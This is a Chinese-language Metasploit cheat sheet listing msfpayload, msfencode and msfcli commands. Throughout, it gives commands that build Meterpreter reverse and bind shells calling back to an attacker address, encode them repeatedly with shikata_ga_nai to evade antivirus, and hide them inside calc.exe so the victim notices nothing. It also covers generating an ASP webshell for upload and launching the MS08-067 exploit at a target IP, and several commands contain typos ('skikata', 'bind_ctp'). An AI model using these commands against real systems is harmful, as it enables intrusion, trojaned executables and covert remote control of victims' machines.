MSF常用的监听模块命令

msfpayload 命令

帮助msfpayload -h

列出所有可用的攻击载荷  msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项（任何攻击载荷都是可以配置的）msfpayload windows/meterpreter/bind_tcp O.

创建一个meterperter的reverse_tcp攻击载荷，回连到your ip的端口，将其保存为名为payload.exe的windows可执行程序msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

与上生成同样的攻击载荷，导出成原始格式文件，该文件将后面的MSFencode中使用msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

与上面生成同样的攻击载荷，但导出成C格式的shellcodemsfpayload windows/meterpreter/bind_tcp LPORT=port C > payload.c

导出成以%U编码方式的javascript语言字符串msfpayload windows/meterpreter/bind_tcp LPORT=port J > payload.java

产生webshell将此webshell上传到服务器，这个步骤要有上传权限msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

启动msfconsole 输入：use exploits/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST your_ipexploit

msfencode 命令

帮助msfencode -h

列出所有可用的编码器msfencode -l

显示编码缓冲区的格式msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

使用shikata_ga_nai编码器对payload.raw文件进行5次编码，然后导出一个名为encoded_payload.exe的文件msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

创建一个经过多种编码格式的嵌套编码的攻击载荷msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

创建一个纯字母数字的shellcode,由ESI寄存器指向shellcode，以C语言格式输出msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

msfcli命令

仅列出渗透攻击模块msfcli|grep exploit

仅列出与windows相关的渗透攻击模块msfcli|grep exploit/windows

对对方IP发起ms08_067_natapi渗透攻击，配置bind_tcp攻击载荷，并绑定在443端口进行监听msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=对方IP E

metasploit高级忍术

创建一个反弹式的meterpreter攻击载荷，回连到192.168.1.1主机的443端口，使用calc.exe作为载苛后门程序，让载荷执行流一直运行在被攻击的应用程序中，最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个反弹式的meterpreter攻击载荷，回连到192.168.1.1主机的443端口，使用calc.exe作为载苛后门程序，不让载荷执行流一直运行在被攻击的应用程序中，同时在攻击载荷执行后也不会在目标主机上弹出任何信息，这种配置非常有用，当你通过浏览器漏洞控制了远程主机，并不想让计算器程序打开呈现在目标用户面前。同样，最后生成用.shikata_ga_nai编码器的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个raw格式的bind_tcp模式meterpreter攻击载荷，用.shikata_ga_nai编码7次，输出以payload.exe命名的windows可执行程序文件，同时启用多路监听方式进行执行msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E